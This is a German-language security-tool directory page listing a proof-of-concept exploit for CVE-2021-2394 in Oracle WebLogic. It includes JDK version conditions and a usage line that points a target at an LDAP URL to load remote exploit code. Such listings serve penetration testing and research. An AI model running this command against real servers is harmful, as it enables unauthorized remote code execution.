Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-2394 — POC zu CVE-2021-2394 | Kitploit
Tools/GitHubGitHub/lz2y/cve-2021-2394
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHublz2y/cve-2021-2394

CVE-2021-2394

POC zu CVE-2021-2394

Repository anzeigen
4020vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-2394

POC für CVE-2021-2394

  • Haftungsausschluss
    • Das Projekt dient ausschließlich zu Lernzwecken. Für direkte oder indirekte Folgen und Verluste, die durch unautorisierte Tests verursacht werden, ist allein der Nutzer verantwortlich.
  • Hinweise

    • Der POC sendet Pakete über IIOP; bitte fügen Sie die entsprechenden Abhängigkeiten hinzu (die Abhängigkeiten der Version 12.2.1.3.0 wurden im Release bereitgestellt)
    • Bitte verwenden Sie für Tests eine ältere jdk-Version mit installiertem weblogic

      Bei der RMI-basierten Ausnutzung ist die jdk-Version auf Versionen vor 6u132, 7u131 und 8u121 beschränkt. In Versionen ab 8u122 wurde ein Deserialisierungs-Whitelist-Mechanismus hinzugefügt, der das Remote-Laden von Code über RMI deaktiviert. Bei der LDAP-basierten Ausnutzung ist die jdk-Version auf Versionen vor 6u211, 7u201, 8u191 und 11.0.1 beschränkt. In Version 8u191 setzte Oracle Einschränkungen für den LDAP-Vektor um, veröffentlichte CVE-2018-3149 und deaktivierte das Remote-Laden von Klassen über JNDI. Quelle: https://www.freebuf.com/vuls/279465.html

    • Falls die Reproduktion in einer virtuellen Maschine nicht möglich ist, siehe https://xz.aliyun.com/t/7498
  • Verwendung:

    • Starten Sie einen ldap-Dienst
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • z. B.: java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • Referenzlinks:

    • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
    • https://github.com/Y4er/CVE-2020-14756
    • https://github.com/Y4er/CVE-2020-2551
  • Updates

    • 2021/8/15 Einige unnötige Codezeilen entfernt
  • Analyseartikel

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
Tool herunterladen